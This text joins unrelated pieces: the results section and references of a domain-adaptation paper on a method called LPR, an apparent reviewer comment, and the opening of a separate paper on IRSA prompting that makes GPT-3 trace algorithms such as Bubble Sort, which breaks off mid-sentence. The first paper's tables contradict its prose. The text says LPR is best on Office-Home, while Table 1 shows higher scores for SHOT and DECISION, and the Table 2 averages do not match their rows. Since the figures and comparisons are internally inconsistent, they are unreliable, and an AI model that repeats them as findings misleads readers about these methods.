**Datasets, training parameters, and implementation details.** We evaluate the performance of the proposed method on four benchmark datasets, i.e., Office (Hoffman et al., 2018b), Office-Caltech (Saenko et al., 2010), Office-Home (Venkateswara et al., 2017), and DomainNet (Peng et al., 2019), which contain data samples from different domains. We designate one of the domains as the target domain and the remaining domains as source domains, as described in Sec. E.1. For fair comparisons, we follow the same experimental settings as previous works (Liang et al., 2020; Ahmed et al., 2021; Liang et al., 2022). Detailed training parameters such as training epochs, learning rates, and batch sizes are described in Sec. E.1. We use ResNet101 (He et al., 2016) and ViT-B_16 (ViT16 for simplicity) (Dosovitskiy et al.) as source models; ResNet101 is used as the target model. The PRN is trained in every epoch of target-model training, whereas the warm-up phase is conducted once. For reliable training, we reinitialize the learning rate at each training epoch of the refinement phase, since $p_c$ and $p_d$ may change for the same sample. The total number of training epochs is 15. We run the proposed method three times using different random seeds {2019, 2020, 2021} in PyTorch (Paszke et al., 2017) and report the average performance.

**Performance Comparison.** We compare our method with state-of-the-art MSDA methods to evaluate its effectiveness. **No Adapt** (also known as “Source Only”) denotes the test performance on target data when a model is trained using only the source data.
Considering the MS setting, we further compare against **No Adapt (SB)**, which is assumed to choose the most suitable source prediction for the adaptation; this is the ideal scenario, but it is usually infeasible. In contrast, **No Adapt (SW)** assumes that a user chooses the worst source prediction. Moreover, we provide **No Adapt (MS)** for the case where the source model is trained using all the source data from the available source domains. We categorize the tested DA methods by their MS settings as MSDA, MS-SFDA, and MSBDA. For MSDA, we present the adaptation results of M$^3$SDA, M$^3$SDA-$\beta$ (Peng et al., 2019), SImpAl$_{101}$ (Venkat et al., 2020), and MFSAN (Zhu et al., 2019); both source data and models are available to these methods. Furthermore, we compare MS-SFDA methods, including SHOT (Liang et al., 2020), SHOT++ (Liang et al., 2021), DECISION (Ahmed et al., 2021), and CAiDA (Dong et al., 2021). For Liang et al. (2021), we also report the performance of SHOT-ens, which averages the soft predictions to form a target prediction, so as to cast the method in an MS setting. DINE (Liang et al., 2022) is a single-source BDA method that extends to MSBDA and is thus used for performance comparisons. DINE uses a two-step learning procedure: source adaptation to a target model, DINE (w/o FT), and further fitting to a specific target domain, DINE (FT). Because the primary objective of generic UDA is to generalize to target domains and maintain performance even under different domain shifts, we mainly compare DINE (w/o FT) with our method.

### 4.2 Experimental Results

The classification results on Office, Office-Caltech, Office-Home, and DomainNet are shown in Tables 1 and 2. “MU”, “MS”, and “MB” refer to MSDA, MS-SFDA, and MSBDA, respectively. A right arrow “$\rightarrow$” denotes an adaptation task; for instance, “$\rightarrow$ W” denotes target adaptation from all the other domains to domain “W.” Because MSDA and MS-SFDA have access to model parameters, the source and target models must share the same structure, and these methods are tested only when the models use ResNet101 in common. BDA does not have such constraints, allowing ViT16 as a source model.

In the MSBDA setting, our method achieves competitive accuracy across the four datasets and, notably, demonstrates performance comparable to the other methods in the MSDA and MS-SFDA settings. Our method accomplishes these results even in the absence of source data and models. The highest accuracy achieved within the MSBDA setting is highlighted in bold. Compared to DINE, the proposed method consistently provides superior classification performance across all datasets and source models. This result demonstrates the effectiveness of our approach in transferring positive knowledge from source domains without the aid of source data and models.

**Results on Office.** We present the adaptation results on Office in Table 1. Our method outperformed DINE (w/o FT) by a margin of 3.6% on average. Furthermore, our method achieved performance comparable to UDA and SFDA methods. Compared to CAiDA (Dong et al., 2021), the state-of-the-art MS-SFDA method, our approach achieved an increase of 0.2% with ResNet101.

**Results on Office-Caltech.** Office-Caltech is known to be comparatively easy for target adaptation, judging by its accuracy under “No Adapt”. Most of the MSDA and MS-SFDA methods achieved substantial performance improvements compared to “No Adapt (MS)”. Our method outperformed DINE (w/o FT) by 1.7% with ResNet101.
**Results on Office-Home.** Our method exhibited a similar trend on Office-Home. The proposed method achieved the best accuracy across all tasks among the UDA and SFDA methods. LPR also outperformed DINE (w/o FT) by a margin of 4.2% on average.

**Results on DomainNet.** Table 2 shows the performance on DomainNet, a challenging benchmark due to its large number of categories and the associated large domain discrepancies.

Table 1: Classification accuracy (%) on Office, Office-Caltech, and Office-Home.

| $f_S$ Methods | Setting | Office | Office-Caltech | Office-Home |
|---------------|---------|--------|----------------|-------------|
| No Adapt (SB) | - | 64.8 | 98.2 | 94.8 |
| No Adapt (SW) | - | 53.9 | 81.5 | 81.1 |
| No Adapt (MS) | - | 64.5 | 82.3 | 80.7 |
| SImpAl$_{101}$ (Venkat et al., 2020) | MU | 99.4 | 97.9 | 71.2 |
| MFSAN (Zhu et al., 2019) | MU | 72.7 | 99.5 | 98.5 |
| SHOT (Liang et al., 2020) | MS | 75.4 | 98.4 | 99.6 |
| DECISION (Ahmed et al., 2021) | MS | 75.4 | 98.4 | 99.6 |
| SHOT++ (Liang et al., 2021) | MS | - | - | - |
| CAiDA (Dong et al., 2021) | MS | 75.8 | 99.8 | 98.9 |
| DINE (w/o FT) (Liang et al., 2022) | MB | 69.2 | 98.6 | 96.9 |
| DINE (FT) (Liang et al., 2022) | MB | 76.8 | 99.2 | 98.4 |
| LPR (Ours) | MB | 77.2 | 99.3 | 98.7 |

Table 2: Classification accuracy (%) on DomainNet.

| $f_S$ Methods | Setting | →Cln | →Inf | →Pnt | →Qdr | →Rel | →Skt | Avg. |
|---------------|---------|------|------|------|------|------|------|------|
| No Adapt (SB) | - | 52.8 | 20.5 | 48.7 | 13.5 | 58.1 | 43.7 | 39.4 |
| No Adapt (SW)* | - | 10.6 | 1.2 | 3.9 | 2.7 | 4.4 | 5.0 | 5.0 |
| No Adapt (MS)* | - | 47.6 | 13.0 | 38.1 | 13.3 | 51.9 | 33.7 | 32.9 |
| M$^3$SDA (Peng et al., 2019) | MU | 57.2 | 24.2 | 51.6 | 5.2 | 61.6 | 49.6 | 41.5 |
| M$^3$SDA-$\beta$ (Peng et al., 2019) | MU | 58.6 | 26.0 | 52.3 | 6.3 | 62.7 | 49.5 | 42.6 |
| SImpAl$_{101}$ (Venkat et al., 2020) | MU | 66.4 | 25.6 | 56.6 | 18.9 | 68.0 | 55.5 | 48.6 |
| SHOT-ens (Liang et al., 2021) | MS | 58.6 | 25.2 | 55.3 | 15.3 | 70.5 | 52.4 | 46.2 |
| DECISION (Ahmed et al., 2021) | MS | 63.2 | 22.3 | 54.6 | 18.2 | 67.9 | 51.4 | 46.3 |
| DINE (w/o FT) (Liang et al., 2022) | MB | 61.4 | 21.5 | 54.7 | 13.4 | 70.9 | 50.3 | 45.4 |
| DINE (FT) (Liang et al., 2022) | MB | 55.9 | 6.3 | 54.2 | 0.2 | 62.2 | 38.6 | 26.6 |
| LPR (Ours) | MB | 63.9 | 24.0 | 55.1 | 13.6 | 70.8 | 51.2 | 46.4 |
| No Adapt (SB) | - | 55.5 | 19.9 | 47.0 | 14.9 | 62.1 | 45.2 | 40.7 |
| No Adapt (SW)* | - | 4.5 | 0.5 | 0.9 | 4.1 | 1.6 | 6.4 | 3.0 |
| DINE (w/o FT) (Liang et al., 2022) | MB | 63.0 | 21.6 | 56.7 | 15.0 | 72.8 | 50.2 | 46.5 |
| DINE (FT) (Liang et al., 2022) | MB | 58.2 | 5.3 | 35.9 | 0.2 | 24.8 | 33.5 | 26.3 |
| LPR (Ours) | MB | 65.2 | 24.2 | 56.9 | 15.8 | 73.1 | 50.6 | 47.6 |

Compared to the other datasets, it is hard to achieve high adaptation accuracy in every setting. Nevertheless, our method achieved performance comparable to all the methods except SImpAl$_{101}$ (Venkat et al., 2020). DINE's performance degraded significantly, by approximately 20%, when FT was used on DomainNet. In Liang et al. (2022), the FT step was optimized for the Office datasets and improved performance on them; however, DomainNet was not used for that optimization, and FT can worsen the domain-shift problem there. Our method did not experience such a failure.
### 4.3 Performance Analysis and Ablation Studies

Table 3: Ablation studies on Office: (a) when each component, including warm-up (WU), label refinement (LR), and target adaptation (TA), is turned on or off, and (b) when the loss functions are combined differently during the LR phase.

**Effect of phases.** In Table 3a, the warm-up (WU) and label refinement (LR) phases of the PRN significantly improved the adaptation performance. LR improved accuracy by 6.6% compared to TA alone, and WU added a further 4.6%. These tests demonstrate the efficacy of the components.

Figure 3: (a) Ablation studies on PRN with loss functions and (b) a refinement interval. (a) and (b) are tested on the Office dataset. (c) Classification accuracy of the refined predictions and target prediction during the target adaptation phase for the “→ Ar” task on the Office-Home dataset.

**Loss function.** Table 3b presents the adaptation accuracy during LR as each loss in Eq. (11) is added. ResNet101 was used for both $f_S$ and $f_T$. LPR achieved performance similar to DINE (w/o FT) when using only $L_{cc}$. Adding $L_{cd}$ and $L_{ld}$ further improved performance by margins of 0.6% and 1.3%, respectively, and a further improvement of 2.1% was achieved with $L_s$. More ablation tests with various $\lambda_{cd}$, $\lambda_{ld}$, and $\lambda_s$ of Eq. (11) are presented in Sec. E.4.

**Training interval of LR.** We then analyze the training interval of the LR phase. By default, the LR phase is performed every epoch of target adaptation. In Figure 3(b), we show the adaptation performance when the interval is increased to 2, 3, and 4 epochs. We found that an interval of 1 epoch was appropriate, and adaptation performance degraded when the refinement process was applied less frequently. In other words, the refinement process is effective throughout adaptation.

**Investigation of the target adaptation phase.** In Figure 3(c), we show how the quality of the refined source predictions changes during target adaptation, reporting the results of adaptation to the Art (Ar) domain of Office-Home. The orange, green, and yellow curves show the evolution of the quality of the source predictions from the Cl, Pr, and Re sources, respectively, and the black curve shows the adaptation performance. At the beginning, each source curve reflects the quality of the PRN output after the warm-up. Up to 2 training epochs, the quality tended to decrease, because the target predictions up to this point were not yet helpful for refinement. However, the quality increased steadily as the refinement phase continued, and the accuracy kept improving. The noisier source predictions (orange and green curves) were refined at a faster rate than the yellow curve: more noisy samples were affected by the refinement phase and their quality improved, implying that the phase is effective.

**Selection of representative predictions $p_c$ and $p_d$.** In Sec. 3.2, we derived the condition for an optimal $p_c$. Nevertheless, because $y_T$ is unknown, it is intractable to determine the representative predictions precisely. In Sec. 3.3, we presented a method to designate $p_c$ that leverages complementary information from multiple sources to avoid incorrect designations. To verify its effectiveness, we tested several alternatives, including random selection (RS) and selection of the most confident prediction (CP).
The proposed method outperformed the alternatives, empirically justifying our selection of $p_c$. We likewise chose $p_d$ as the lowest-confidence prediction in $P_d$ and tested several alternatives to justify this choice. The results can be found in Sec. E.5.

## 5 Conclusion and Future Work

In this paper, we proposed a novel MSBDA pseudo-labeling framework that uses only the predictions of source models to explore positive knowledge from multiple source domains. We derived a theoretical analysis to demonstrate the effectiveness of the proposed training method and justified the design of the PRN architecture, which uses an attention mechanism to resolve complex relations among different domains. We evaluated the performance of the proposed method on various benchmark datasets and demonstrated its superiority in comparison to state-of-the-art methods in various domain adaptation settings. In future work, we will investigate open-set MSBDA problems.

REFERENCES

Sk Miraj Ahmed, Dripta S Raychaudhuri, Sujoy Paul, Samet Oymak, and Amit K Roy-Chowdhury. Unsupervised multi-source domain adaptation without access to source data. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10103–10112, 2021.

Konstantinos Bousmalis, Nathan Silberman, David Dohan, Dumitru Erhan, and Dilip Krishnan. Unsupervised pixel-level domain adaptation with generative adversarial networks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 3722–3731, 2017.

Koby Crammer, Michael Kearns, and Jennifer Wortman. Learning from multiple sources. Journal of Machine Learning Research, 9(8), 2008.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255. IEEE, 2009.

Jiahua Dong, Yang Cong, Gan Sun, Bineng Zhong, and Xiaowei Xu. What can be transferred: Unsupervised domain adaptation for endoscopic lesions segmentation. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 4023–4032, 2020.

Jiahua Dong, Zhen Fang, Anjin Liu, Gan Sun, and Tongliang Liu. Confident anchor-induced multi-source free domain adaptation. Advances in Neural Information Processing Systems, 34: 2848–2860, 2021.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In International Conference on Learning Representations, 2021.

Yaroslav Ganin, Evgeniya Ustinova, Hana Ajakan, Pascal Germain, Hugo Larochelle, François Laviolette, Mario Marchand, and Victor Lempitsky. Domain-adversarial training of neural networks. The Journal of Machine Learning Research, 17(1):2096–2030, 2016.

Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 770–778, 2016.

Judy Hoffman, Mehryar Mohri, and Ningshan Zhang. Algorithms and theory for multiple-source adaptation. Advances in Neural Information Processing Systems, 31, 2018a.

Judy Hoffman, Eric Tzeng, Taesung Park, Jun-Yan Zhu, Phillip Isola, Kate Saenko, Alexei Efros, and Trevor Darrell. Cycada: Cycle-consistent adversarial domain adaptation. In International Conference on Machine Learning, pp. 1989–1998. PMLR, 2018b.

Shatha Jaradat.
Deep cross-domain fashion recommendation. In Proceedings of the Eleventh ACM conference on recommender systems, pp. 407–410, 2017. Chen-Yu Lee, Tanmay Batra, Mohammad Haris Baig, and Daniel Ulbricht. Sliced wasserstein discrepancy for unsupervised domain adaptation. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10285–10295, 2019. Yitong Li, David E Carlson, et al. Extracting relationships by multi-domain matching. Advances in Neural Information Processing Systems, 31, 2018. Jian Liang, Dapeng Hu, and Jiashi Feng. Do we really need to access the source data? source hypothesis transfer for unsupervised domain adaptation. In International Conference on Machine Learning, pp. 6028–6039. PMLR, 2020. Jian Liang, Dapeng Hu, Yunbo Wang, Ran He, and Jiashi Feng. Source data-absent unsupervised domain adaptation through hypothesis transfer and labeling transfer. IEEE Transactions on Pattern Analysis and Machine Intelligence, 44(11):8602–8617, 2021.
vLJg4wgBPu
- I was able to verify that GPT-4 correctly outputs a trace for the example shown in Prompt 1. However, the same prompt on a slightly larger input produces a correct answer but starts to include comments like one might see in code. Is this expected?
GPT IS BECOMING A TURING MACHINE: HERE ARE SOME WAYS TO PROGRAM IT

Anonymous authors Paper under double-blind review

ABSTRACT

We demonstrate that, through appropriate prompting, GPT-3 can be triggered to perform iterative behaviours necessary to execute (rather than just write or recall) programs that involve loops, including several popular algorithms found in computer science curricula or software developer interviews. We trigger execution and description of iterations by regimenting self-attention (IRSA) in one (or a combination) of three ways: 1) using strong repetitive structure in an example of an execution path of a target program for one particular input, 2) prompting with fragments of execution paths, and 3) explicitly forbidding (skipping) self-attention to parts of the generated text. On dynamic-program execution, IRSA leads to larger accuracy gains than replacing the model with the much more powerful GPT-4. IRSA has promising applications in education, as the prompts and responses resemble student assignments in data structures and algorithms classes. Our findings hold implications for evaluating LLMs, which typically target in-context learning: we show that prompts that may not even cover one full task example can trigger algorithmic behaviour, enabling the solution of problems previously thought hard for LLMs, such as logical puzzles. Consequently, prompt design plays an even more critical role in LLM performance than previously recognized.

1 INTRODUCTION

Large language models (LLMs) (Brown et al., 2020; Rae et al., 2021; Chowdhery et al., 2022; OpenAI, 2023) are trained on large text datasets, which typically include descriptions of procedures and even computer programs (Chen et al., 2021). Their performance on complex reasoning tasks remains limited even with advanced prompting methods, e.g., Chain-of-Thought (CoT) (Schwartz et al., 2020; Zelikman et al., 2022; Nye et al., 2021; Wei et al., 2022; Wang et al., 2022b; Zhou et al., 2022; Creswell et al., 2022; Wang et al., 2022a; Liu et al., 2022; Kojima et al., 2022; Li et al., 2022a). This implies that, despite their size, current LLMs are unlikely to execute algorithms or solve problems that require many (or iterated) reasoning steps, such as logical deduction and logical grid puzzles in BIG-bench Lite (Srivastava et al., 2022), in a direct, savant-like manner.

LLMs generate tokens in order, each based on previous tokens in the sequence, whether these are part of the prompt or have just been generated by the LLM itself. Such self-attention could allow an LLM to use all previously generated tokens as the store of information needed for tracking reasoning steps, states, etc.\footnote{This is likely contributing to the success of CoT prompting, in addition to such prompts’ explanatory value.} Such use of generated tokens would resemble a classical Turing machine with its memory tape (Turing, 1936). In principle, a non-trivial recurrent transformer model with infinite attention could be Turing-complete and capable of executing arbitrary routines, as long as the attention mechanism can be controlled stringently enough. But even in relatively simple settings, LLMs appear to resist strict controls. Slight changes in prompts can yield dramatically different responses (Liu et al., 2021; Malkin et al., 2022; Shi et al., 2023), because many recurrent patterns in the training data are encoded into a single model, and the learned patterns overlap and vary in context size.
Thus it is easy to mislead an LLM with a prompt containing accidental alphabetical or numerical ordering, or some undetectable semantic bias (Zhao et al., 2021; Lu et al., 2022; Min et al., 2022). In Section 2, we introduce much stricter attention controls that instruct LLMs to unroll the reasoning steps of a procedure of initially undetermined length and decide when the solution is found: Iteration by Regimenting Self-Attention (IRSA). The basic way to achieve such deliberate self-attention control is through highly structured prompting with an execution path for one example, as illustrated for the Bubble Sort algorithm in Prompt 1, which encourages an LLM to output not just the sorted sequence but also the swap count (response in Prompt A.1 in the Appendix), a task that is challenging to solve in a savant manner. We further explore fragmented prompting, which combines multiple fragments of execution paths, as well as the strategy of skipping parts of generated text when performing self-attention. We also discuss interpreter/compiler prompts that can translate an algorithm in a high-level programming language into an IRSA prompt that GPT-3 can execute. In Section 3, we present results on a wide range of algorithms taught in computer science curricula and used to test software engineers in coding interviews, including string manipulations, dynamic programming, and stack operations.

Our findings point to broader applications for LLMs in software engineering and education (Gao et al., 2022; Parisi et al., 2022; Schick et al., 2023; Mialon et al., 2023). More pressingly, they point out a critical issue in evaluating in-context learning of LLMs, suggesting that current evaluations may underestimate LLMs’ abilities if prompts can combine natural language instructions with algorithmic iterative reasoning. The sensitivity of performance to prompt design may be amplified by the iterative reasoning triggered by the prompt, which then raises the question: if one LLM beats another on a task, is it simply because we have not found the right prompt for the second model? E.g., IRSA increases the performance of the GPT-3 family on logical deduction puzzles from 32% to 76%. The discussion in the Appendix also includes an experiment with GPT-4 (OpenAI, 2023) on a well-known dynamic programming task, showing that even the latest member of the family cannot consistently execute code without IRSA-style prompting.

2 ITERATION BY REGIMENTING SELF-ATTENTION (IRSA): EXPLAIN LIKE I’M FIVE

Prompt 1, which triggers autoregressive execution of the Bubble Sort algorithm on an arbitrary input sequence, illustrates the basics of IRSA. For one input sequence, the prompt shows all state changes and explains each change before it occurs. The explanation is colloquial, but its structure is both rigid and repetitive, strictly regimenting the attention to the rules (corresponding to program instructions) and state changes. This strategy hardens the attention sufficiently to facilitate disciplined procedural reasoning, while leaving non-regimented content open to interpretation. (Sorting a sequence of 4 integers is demonstrated, but the same prompt can also be used to sort characters alphabetically or animals by size, and be applied to both shorter and longer input lists.) IRSA could be thought of as an instance of Chain-of-Thought prompting.
However, a significant distinction lies in the number of reasoning steps, which is limited and fixed in usual CoT applications, and in the thorough annotation of steps in the order of reasoning, which is especially important in the treatment of conditionals: instead of specifying the effect of a state change (swapping two elements) and then explaining why it was done (because the two were out of order), the ‘why’ is given first. While either order may be equally explanatory in the prompt, the difference becomes evident in generation, when the LLM attempts to follow the prompt’s blueprint. If the explanation follows making a choice in the prompt, then the generation will follow the same pattern: make a cognitive leap to decide on a move, then rationalize that choice. In IRSA, instead, the reasoning comes first, and it is further segmented into substeps, so that new tokens inform future choices as soon as possible: “Check if 2<3. Is it true?” triggers evaluation, and the next generated token, “No” or “Yes”, triggers copying the pattern from the prompt that leads to swapping the elements (or not). Similarly, a new iteration is triggered by first recalling the value of the swap flag. The structure of the prompt acknowledges the LLM’s autoregressive nature and does not require big reasoning leaps in generation. Instead, the LLM is instructed to use the generated token stream as a memory tape that triggers the desired behaviour. Interestingly, as LLMs can make educated guesses on how to follow any recipe, one can instruct with various levels of detail. Here, the investigation of the swap flag happens after all pairs have been visited, as we expect that an LLM may infer how to do the same in generation. In contrast, in Prompt A.4, the state includes the iterator $i$, which is checked after each state transition to detect when the time for deciding on the next iteration has come. Examples of basic IRSA for single-loop programs can be seen in Prompts A.5 and A.6, and for double-loop programs in Prompts 1, A.4, and 2. In each of these examples, a single prompt is provided for a task, which, when combined with a new instance of the task, triggers the execution of an iterative algorithm, with a potentially unknown number of iterations until the stopping condition is met.

Prompt 1. Bubble Sort: The prompt describes iterative state evolution, including counting swaps, and making the determination when to stop.

Problem: 2, 3, 1, 5 EXECUTION Prep Length of the list: 4 Number of consecutive pairs: 3 a=[2 3 1 5] set n_swaps=0 EndPrep Iteration: set swap_flag=false. The state is: State: a=[2 3 1 5], n_swaps=0, swap_flag=false EndState Pair a[1,2] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[2 3 1 5], n_swaps=0, swap_flag=false EndState Pair a[2,3]= [3 1] Check if 3<1. Is it true? No. Thus, we set swap_flag=true, increase n_swaps by one, and in the latest a=[2 3 1 5] swap 3 and 1 to get into state: State: a=[2 1 3 5], n_swaps=1, swap_flag=true EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[2 1 3 5], n_swaps=1, swap_flag=true EndState swap_flag is true, so do another iteration Iteration: set swap_flag=false. The state is: State: a=[2 1 3 5], n_swaps=1, swap_flag=false EndState Pair a[1,2] = [2 1] Check if 2<1. Is it true? No.
Thus, we set swap_flag=true, increase n_swaps by one, and in the latest a=[2 1 3 5] swap 2 and 1 to get into state: State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState Pair a[2,3] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=true EndState swap_flag is true, so do another iteration Iteration: set swap_flag=false. The state is: State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[1,2] = [1 2] Check if 1<2. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[2,3] = [2 3] Check if 2<3. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState Pair a[3,4]= [3 5] Check if 3<5. Is it true? Yes. Because of that, we leave state as is State: a=[1 2 3 5], n_swaps=2, swap_flag=false EndState swap_flag is false, so stop the iteration Final List: 1, 2, 3, 5 Number of swaps: 2 END OF EXECUTION Problem: 0, 3, 8, 5, 6 EXECUTION

Prompt 2. Logical deduction puzzle IRSA prompt. Playground link (use with 0 temperature)

PUZZLE: The following objects need to be ordered. obj1 is the biggest. obj2 is smaller than obj3. obj1 is bigger than obj2. QUESTION: Which object is the biggest? START Parsing step: Items: obj1, obj2, obj3 Number of items: 3 Statement 1: obj1 is the biggest. Statement 2: obj2 is smaller than obj3. Statement 3: obj1 is bigger than obj2. Scoring identification step: Scores will refer to size. Since we have 3 items, let’s assume that the biggest gets a score of 3 pounds and the smallest gets the score of 1 pound. Translation step: Available variable names: x, y, z, a, b, c Map item scores of ‘obj1’, ‘obj2’, ‘obj3’ to variable names x, y, z obj1 score is x; obj2 score is y; obj3 is z; Statement 1: ‘x’ is the biggest. Statement 2: ‘y’ is smaller than ‘z’. Statement 3: ‘x’ is bigger than ‘y’. Initialization step: Words used to qualify the relationships: smaller, bigger, biggest Orientation step: the biggest: refers to the score of 3 smaller: refers to smaller score bigger: refers to larger score Initialize so that all scores are different numbers between 1 and 3 Score_assignment_A: x=2, y=3, z=1 Iterative reasoning Iteration 1: update_flag=false Statement 1: ‘x’ is the biggest, meaning: x should be 3 In Score_assignment_A, x is 2 x is not what it should be, so we need to make a change, so we set update_flag=true and we need to make a swap. In the statement there is only one variable and it is x. We need to find another. We want x to be 3, but we see that in Score_assignment_A that 3 is assigned to y, so we swap values of x and y to make Score_assignment_B: x=3, y=2, z=1 Statement 2: ‘y’ is smaller than ‘z’, meaning: y<z In Score_assignment_B, y is 2 and z is 1, so y<z maps to 2<1 2<1 is false, so we need to make a change, so we set update_flag=true and we need to make a swap. In the statement there are two variables and those are y and z so we swap in Score_assignment_B to make Score_assignment_C: x=3, y=1, z=2 Statement 3: ‘x’ is bigger than ‘y’, meaning x>y In Score_assignment_C, x is 3 and y is 1, so x>y maps to 3>1 3>1 is true, so we don’t need to make a change. End of iteration. Since update_flag is true, we need more iterations.
Iteration 2: update_flag=false Statement 1: ‘x’ is the biggest, meaning: x=3 In Score_assignment_C, x is 3, so x=3 maps to 3=3 3=3 is true, so we don’t need to make a change. Statement 2: ‘y’ is smaller than z, meaning: y<z In Score_assignment_C, y is 1 and z is 2, so y<z maps to 1<2 1<2 is true, so we don’t need to make a change. Statement 3: ‘x’ is bigger than y, meaning x>y In Score_assignment_C, x is 3 and y is 1, so x>y maps to 3>1 3>1 is true, so we don’t need to make a change. End of iteration. Since update_flag is false, we have finished all iterations and found the correct order. The correct score assignment is the last (Score_assignment_C): x=3, y=1, z=2 Reverse translation step: Map items ‘obj1’, ‘obj2’, ‘obj3’ to variable names x, y, z so we replace x by obj1, y by obj2, and z by obj3 to get size scores: obj1 has the score 3; obj2 has the score 1; obj3 has the score 2 Question: Which object is the biggest? Answer: obj1 Sorting all by score starting with obj1: with score 3, obj1 with score 2, obj3 with score 1, obj2 END

PUZZLE: On a shelf, there are five books: a gray book, a red book, a purple book, a blue book, and a black book. The red book is to the right of the gray book. The black book is to the left of the blue book. The purple book is to the left of the gray book. The purple book is the second from the right. QUESTION: Which is leftmost? START

2.1 Using IRSA to reason over logical puzzles.

In addition to program execution, iterative reasoning is required in solving a number of NLP word problems (e.g., Srivastava et al., 2022). The BIG-bench Logical Deduction task requires ordering several objects given their pairwise relationships in natural language (e.g., a robin is standing on a branch to the right of a raven, but a sparrow is the left-most). Even for a small number of objects, LLMs struggle to solve such puzzles in zero- or few-shot settings, much as human solvers cannot just see the correct answer instantly without scratch paper. This task is not solved well by LLMs without external search/reasoning/inference algorithms, such as ThinkSum (Ozturkler et al., 2023). However, a variant of the Bubble Sort algorithm adapted to this problem, shown in Prompt 2, can be used to solve 76% of these puzzles. The prompt first translates the problem into a canonical form and then, in IRSA style, describes an iterative swapping procedure that rearranges the objects.

2.2 Fragmented prompting.

Another way to trigger iterative behaviour is through fragmented prompting, illustrated in Prompt 3, which relies on complete state specification and fragmentation. Prompt 3 does not fully cover the entire execution path of any single example. Instead, it follows the first three state changes for the sequence 2, 3, 1, 5, and then stops in the middle of a sentence. It then shows 6 additional fragments of execution paths for different problems. Interestingly, this prompt triggers iterative behaviour, where the language model accurately executes the algorithm on a given input and outputs END OF EXECUTION when the termination condition is met. Viewing this prompt as an instance of in-context learning, it is challenging to classify it in the usual terms. It goes beyond 0-shot learning, as it contains explanations specific to the algorithmic sorting task. Yet, as opposed to what few-shot CoT prompting might do, it does not work out any single example of array sorting.
Instead, it provides fragments of patterns that can be stitched together to execute the algorithm (and GPT-3 CODE-DAVINCI-002 does execute it correctly for new inputs). The potential advantage of such fragmented prompting is that the prompt can be shorter and include a greater variety of situations that may be encountered in new problems. A potential disadvantage is that the language model may get confused by the fragmentation and start hallucinating new independent fragments. In this case, we avoided that by having the first fragment start from the beginning of execution, go through several state transitions, and end mid-sentence. Because of this, when a new problem is given, the language model starts running the execution path from the beginning and later refers to the various cases in the prompt for guidance on how to proceed.

2.3 Skip attention.

Prompt 3 also illustrates the idea of attention skipping. Whether using a single-execution or a fragmented prompt, if the state in the <state>*</state> structure is complete, the attention mechanism can generate the next token without attending to all the generated text. It is sufficient to attend to the prompt and the text generated after and including the last state. If the skipping is implemented on the server side, akin to stop-word functionality, then skipping unnecessary attention saves computation: the state of the model at the end of the prompt is cached and used to continue processing from the latest generated <state> marker, ignoring the text generated in between. Skip-to-state can also be implemented on the client side, by iteratively updating the original prompt: the latest <state>*</state> structure is concatenated to the original prompt, and the generative model is called with </state> as a stop sequence. (We did the latter in our experiments; a minimal client-side sketch is given at the end of Section 2.4.) In both cases, the skip-to-state strategy should increase the number of tokens that can be generated, as self-attention, which grows linearly with the generated text, is the primary cause of the token limitations; the skip-to-state strategy keeps the self-attention cost constant. As IRSA requires the unrolling of potentially long iterative algorithms, these savings are important. For example, running a dynamic program that keeps track of 2D matrices is only practical in this manner. (See also Schuurmans (2023) for an external-memory approach to dealing with limited attention length; here we instead deal with it by skipping parts of the generated text.) Another advantage of skip-to-state attention is that, by attending only to the necessary information, the generative model is less likely to get confused by accidental patterns created in its own generated text (see Section A.3 and Figure A.2).

²The full execution path in this style is shown in Prompt A.4.

Prompt 3. Fragments: An incomplete path for the first few Bubble Sort state transitions for one sequence is followed by state transitions involving different sequences at different execution points. Initial part of the response is marked green. Skip attention: The part of the response up to the last state is not needed to continue the generation. Only the prompt, the last <state></state>, and the text after it are necessary to generate the next token. Playground link (use with 0 temperature)

Problem: 2, 3, 1, 5 EXECUTION Length of the list: L=4 Number of pairs: P=3 a=[2 3 1 5] set n_swaps=0, set i=P=3, set swap_flag=true. <state> a=[2 3 1 5] i=3 P=3 n_swaps=0 swap_flag=true </state> Since i=3 and P=3, i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0.
The state is: <state> a=[2 3 1 5] i=0 P=3 n_swaps=0 swap_flag=false </state> Since i=0 and P=3, these two are different, so we continue a[i]=a[0]=2 a[i+1]=a[1]=3 Because 2<3 is true we keep state as is and move on by increasing i <state> a=[2 3 1 5] i=1 P=3 n_swaps=0 swap_flag=false </state> Since i=1 and P=3, these two are different, so we continue a[i]=a[1]=3 a[i+1]=a[2]=1 Because 3<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[2 3 1 5] swap 3 and 1, and increase i, and keep P as is to get <state> a=[2 1 3 5] i=2 P=3 n_swaps=1 swap_flag=true </state> Since i=2 and

